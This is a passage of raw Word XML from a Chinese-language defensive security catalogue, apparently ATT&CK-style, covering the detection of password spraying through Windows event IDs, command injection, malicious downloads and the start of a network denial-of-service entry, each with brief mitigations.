        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同账号</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能是由于密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>喷洒</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导致的失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADFF031" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>喷洒</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，请</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看是否</w:t>
      </w:r>
      <w:r>
        <w:t>有以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0E5CB3" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域控制器：事件</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID 4625</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审核登录</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（成功和失败）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E06EACA" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域控制器：事件</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4771</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证服务</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（成功与失败）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69FDDC" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有系统：事件</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4648</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审核登录</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（成功和失败）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21396D" w14:textId="49E8040B" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="004F176D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="007029CC" w14:paraId="474E9716" w14:textId="77777777" w:rsidTr="007029CC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59955C45" w14:textId="1F8ADD04" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>1224</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FCC5D4E" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5201A5D2" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24435291" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AF0EA05" w14:textId="45C34005" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="391D405A" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228921E9" w14:textId="119D0516" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r>
        <w:t>命令注入是一种攻击，其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>当应用程序将用户提供的不安全数据（表格，</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>标头等）传递到系统外壳时，可能会发生命令注入攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09054619" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC"/>
    <w:p w14:paraId="2A5EF311" w14:textId="179F9FAE" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="007029CC" w:rsidRPr="005C4554" w14:paraId="73082A62" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="353E2BED" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="005C4554" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2D280302" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="005C4554" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007029CC" w:rsidRPr="003A640F" w14:paraId="43A84344" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B4ED675" w14:textId="3BE563B5" w:rsidR="007029CC" w:rsidRPr="003A640F" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>白名单流程过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A860CDD" w14:textId="33FA9A46" w:rsidR="007029CC" w:rsidRPr="003A640F" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>我们可以使用白名单来阻止浏览器创建的可疑进程。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FD8C5AD" w14:textId="4A246FE3" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="004F176D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="007029CC" w14:paraId="48ABC24A" w14:textId="77777777" w:rsidTr="007029CC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C2DFB96" w14:textId="5EC2DFB8" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>1225</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E24587F" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B19978F" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FD842A2" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FFE450D" w14:textId="36811A18" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40513F7E" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD93E10" w14:textId="74978FB0" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以在网站中嵌入恶意代码，并在用户下载并执行后感染机器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7570522A" w14:textId="710CFF94" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="007029CC" w:rsidRPr="005C4554" w14:paraId="40DFBEB1" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6D8EF702" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="005C4554" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="20A6FA5E" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="005C4554" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007029CC" w:rsidRPr="003A640F" w14:paraId="1882E49F" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A35E45" w14:textId="4F34F9DC" w:rsidR="007029CC" w:rsidRPr="003A640F" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>政策执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30647255" w14:textId="3A058341" w:rsidR="007029CC" w:rsidRPr="003A640F" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>我们可以将策略设置为拒绝无符号二进制执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72E542D6" w14:textId="00892072" w:rsidR="007029CC" w:rsidRPr="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC"/>
    <w:p w14:paraId="1AD037A3" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络拒绝服务</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="001810EF" w:rsidRPr="00A65911" w14:paraId="48431E23" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F3243C" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1498</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AC1D83B" w14:textId="15610A72" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:lastRenderedPageBreak/>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始访问</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>恶劣影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09911F63" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F6DC52D" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>传感器</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>健康和状态，网络协议分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络入侵检测系统，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>设备日志</w:t>
